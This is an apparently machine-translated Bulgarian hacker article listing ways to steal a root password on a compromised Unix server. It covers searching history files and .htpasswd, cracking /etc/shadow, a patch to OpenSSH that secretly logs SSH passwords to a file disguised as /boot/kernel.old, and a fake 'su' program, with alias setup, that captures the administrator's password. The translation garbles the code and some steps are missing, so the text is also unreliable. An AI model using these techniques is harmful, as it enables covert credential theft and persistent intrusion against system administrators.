ПредишенСледващото

Със стария HakZony.

10 начина да се чука улица парола

Може би най-големият проблем е определянето на Rutaceae хакнете парола. Дори когато хакер счупи система на която и да използват, за да получите своята парола не е лесно. Но всяка гайка има винт, така че позволете ми да разкрие 10 универсални начини за това важно проучване на информация). Не, дори не е необходимо да се срещне с администратора и да пие бирата си в безсъзнание (или по-скоро, на държавата, в която той ще ви разкрие важна информация). Всичко е много по-лесно, отколкото съществуващите техники, които след приложението, от вас ще получат парола корен. Разбира се, всичко зависи от ситуацията. Всички те ще бъдат обсъдени по-долу.

1. Търсене в Perl / PHP скриптове.

Методът се използва при всички варианти на хакерство.

2. Търсене в историята-файлове.

администраторите често използват програмата за конзола, която предава паролата на командния ред. Всичко е записано в историята-файл, наречен .bash_history (разбира се, и за другите тълкуватели на името на файла ще бъдат различни). Има също така може да получи INFA поради грешка в командата администратор (например, видях как администраторът вместо су вкара PSU, а след това парола).

Има и друга история файл. Той призова .mysql_history и също е в домашната директория на потребителя. Там можете да намерите команди за промяна на пароли за SQL-достъп. Тази парола може да съвпадне с улица.

Методът е приложим само когато има пълен контрол над системата. Но това, което се случва, е, когато историята-файлове имат атрибут 644. Намерете тези файлове (и след това се чете), можете да използвате / -perm 644 името на командата находка * _history.

3. Търсене в .htpasswd.

Разкодирай тези хешове да програмирате Джон Изкормвача. Аз не ви научи да го направя, така че мисля, че този метод вие разбирате.

4. Търсене в други файлове.

Има сървър, където пароли са специфицирани в досиетата на трети страни. Например, аз бях изправен пред ситуация, в която паролата е в досието на улица socks5.password.

Внимание! Тези файлове не могат да бъдат на разположение за четене. Ето защо, всичко зависи от ситуацията тук.

5. отбелязва в поле.

администраторите често оставят важни файлове в техните директории. Те съдържат някои бележки. Възможно е, че сред тези, които можете да се срещнете и пароли. Аз самият съм срещал такъв naryl улица и парола във файл бележки. Обърнете внимание на такива неща.

6. Търсене на трупите.

7. смъркане на данни.

Някои руткитове съдържат местно обучени, която ви позволява лесно да разберете паролите до SSH (проста модификация на / ЮЕсАр / хамбар / SSH-съвместим дърводобива;)). Обикновено такава подкрепа и пътя до файла с дневника, посочено в документацията на руткит). Това е добре, но разстроен само едно нещо: по-голямата част от руткит съдържа SSH стария, който поддържа само първия протокол. В резултат на това, атакуващият може да се представяте за кураж.

Но това, което предотвратява изгради своя собствена SSH и да включат в него запомнянето на паролите? Точно така! Никой не. OpenSSH е в пакета с името на файла, sshconnect1.c. след това се вмъква в съдържанието му следните линии:

След шиене snprintf (бърз, sizeof (ред), "[защитена електронна поща]% парола% .128s'S", server_user, домакин);

ifile = fopen ( "/ обувка / kernel.old", «а»);
fprintf (ifile, «сесия% S% S», server_user, домакин);
fclose (ifile);

След шев парола = read_passphrase (бърза, 0);
ifile = fopen ( "/ обувка / kernel.old", «а»);
fprintf (ifile, «парола е% S», парола);
fclose (ifile);

Ако всичко е направено правилно, SSH срещат без инциденти. Сега, администраторът няма да забележите недостатък в системата, и вие ще знаете паролата за SSH. Когато той отива като корен и той ще се разкайва парола).

8. преструва системна услуга).

Този метод, който описах в един от хакерски стаи (Yuniksoid, Fun в Linux). Поради това, потребителите, които четат на хакера не посетите сайт (и обратно), той няма да бъде излишно да се повтаря чантата на трикове.

Така че, е създаден, за да прочетете файла:

#define SORRY «Съжалявам»
#define PFILE «ПТУ / .screen»
#define MYPATH «ПТУ / .screen_active»
#include
нищожен sigexit (инт не);
Int основни () знак подаване [40];
харак копнее [100];
Int Filep;
сигнал (SIGINT, sigexit);
ФОРМАТ ( «Парола:»);
система ( «stty-ехо»);
scanf ( "% S", преминават);
система ( «stty ехо»);
ФОРМАТ ( "");
Filep = fopen (PFILE «w»);
fprintf (Filep, «Pass е% S», подай);
fclose (Filep);
ФОРМАТ ( "% S", съжалявам);
strcpy (копнее, "");
strcat (копнее "/ хамбар / LN -sf / хамбар / СУ");
strcat (копнее, MYPATH);
система (копнее);
изход (0);
>
нищожен sigexit (инт не) система ( «stty ехо»);
ФОРМАТ ( "");
изход (0);
>

и обиждате su.c. Ако се вгледате в един прост код можете да видите, че тя е пълна с имитация / хамбар / СУ, само с парола, за да влезете ПТУ / .screen файл. Самата двоичен ще бъде в ПТУ / .screen_active файл (всички пътища в сравнение с домашната директория на потребителя). След като файлът се изпълнява, той заменя стандартната / BIN / СУ. По този начин, на администратора си мисли, че грешна парола, тъй като вторият опит Suede ще бъде успешен.

Преди да се провери този метод на практика, моля, напиши линия псевдоним су /home/user/tmp/.screen_active файл

/.bash_profile и изчакайте, докато администраторът реши да suidnutsya корен. Когато това се случи парола).

10 стандартен начин.

И най-накрая, че е време да ви разкажа за най-тривиален начин. Хакерът улавя системата и достъп / и т.н. / сянка. Освен това, всички от сценария на разшифроването е взето, добър речник, и да се надяваме само за късмет. Мисля, че не сте просто се сблъскват с този метод. И интересното е, че постоянно съм забравил за другата 9.

Свързани статии

Подкрепете проекта - споделете линка, благодаря!